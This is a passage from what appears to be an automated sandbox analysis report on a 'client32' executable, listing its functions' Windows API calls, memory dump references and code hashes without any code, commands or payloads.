                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5DB
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109DD66,?,?,1109E8BF,00000064,00000006,?,11066C00,0000048C,00000001,00000000,NSMWClass), ref: 1109D5E8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$Event$FileUnmapView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2427653990-0
                                                                                                                                                                • Opcode ID: ab6c90776147f09290a5f249941666f4232c26c70d1da2a2b111b21ea067ecfc
                                                                                                                                                                • Instruction ID: 305866375ee5fc950d06dd2839fb51b543f3d5a1eb7983ef4fa68e21372a5f05
                                                                                                                                                                • Opcode Fuzzy Hash: ab6c90776147f09290a5f249941666f4232c26c70d1da2a2b111b21ea067ecfc
                                                                                                                                                                • Instruction Fuzzy Hash: CF11EFB59407489BD720DFAAC8D481AFBF9AE583043514E7EE19AC3650C674E9489B50
                                                                                                                                                                Function 11113150 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                                                                                                • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                                                                                                • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                                                                                                • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                                                                                                • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Select$Stock$Clip$Brush
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2690518013-0
                                                                                                                                                                • Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                                                                                                • Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
                                                                                                                                                                • Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                                                                                                • Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
                                                                                                                                                                Function 11157600 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _malloc.LIBCMT ref: 11157646
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • _memset.LIBCMT ref: 1115765F
                                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 111576BF
                                                                                                                                                                • _malloc.LIBCMT ref: 111576E7
                                                                                                                                                                • _free.LIBCMT ref: 111577C3
                                                                                                                                                                • _free.LIBCMT ref: 111577CF
                                                                                                                                                                  • Part of subcall function 110EDF10: _memmove.LIBCMT ref: 110EE02F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free_malloc$AllocateBitsHeap_memmove_memset
                                                                                                                                                                • String ID: (
                                                                                                                                                                • API String ID: 3140430649-3887548279
                                                                                                                                                                • Opcode ID: fb824e49bafe16ac61aeddce42f9fdce132aaf5f509c088f0f52e644acdd3b4c
                                                                                                                                                                • Instruction ID: 5149e9e96c6edf4fd4ef2e7de0944cd089d7251e2f1b70461ebbd6bcbe1ab8a4
                                                                                                                                                                • Opcode Fuzzy Hash: fb824e49bafe16ac61aeddce42f9fdce132aaf5f509c088f0f52e644acdd3b4c
                                                                                                                                                                • Instruction Fuzzy Hash: EB5161B5A016149FDB50DF28CC81F9AB7B9EF89304F4551A9EA19DB341DB30EA40CF68
                                                                                                                                                                Function 110B73D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                  • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B026C
                                                                                                                                                                  • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B029D
                                                                                                                                                                  • Part of subcall function 110B0AD0: timeGetTime.WINMM(_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B0AD6
                                                                                                                                                                  • Part of subcall function 110B0AD0: timeGetTime.WINMM(111F00F8,111E5C98,?), ref: 110B0BA5
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B743D
                                                                                                                                                                • GetDC.USER32(00000000), ref: 110B7481
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B748C
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7497
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110B74A3
                                                                                                                                                                  • Part of subcall function 110B3090: SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                                                                                                  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                                                                                                  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                                                                                                  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                                                                                                  • Part of subcall function 110B3090: WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                                                                                                  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
                                                                                                                                                                • String ID: TraceScrape$_debug
                                                                                                                                                                • API String ID: 2936113293-4091781993
                                                                                                                                                                • Opcode ID: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
                                                                                                                                                                • Instruction ID: 6857b597a808110f0f281143ea82df92f461d6df4c4e0b5b1330fe4484300919
                                                                                                                                                                • Opcode Fuzzy Hash: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
                                                                                                                                                                • Instruction Fuzzy Hash: E941A679E042469BDB05CFB4C8D4FAFBBB5EB84704F1941ADE905AB285DA70EC04C7A4
                                                                                                                                                                Function 11027030 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 11027081
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$DispatchSleepTranslate
                                                                                                                                                                • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                                                                                                • API String ID: 3237117195-3850961587
                                                                                                                                                                • Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                                                                                                • Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
                                                                                                                                                                • Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                                                                                                • Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
                                                                                                                                                                Function 110B90A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                                                                                                • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                                                                                                • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                                                                                                • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                                                                                                • API String ID: 1092798621-1973987134
                                                                                                                                                                • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                                                                                                • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                                                                                                • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                                                                                                • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                                                                                                Function 1112B340 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                                                                                                  • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                                                                                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                                                                                                • _calloc.LIBCMT ref: 1112B3AD
                                                                                                                                                                • _free.LIBCMT ref: 1112B44B
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                                                                                                • String ID: ntohl$ws2_32.dll
                                                                                                                                                                • API String ID: 2881363997-4165132517
                                                                                                                                                                • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                                                                                                • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                                                                                                • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                                                                                                • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                                                                                                Function 1100F3D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3FD
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F420
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 1100F4A4
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1100F4B2
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4C5
                                                                                                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F4DF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                • API String ID: 2427920155-3145022300
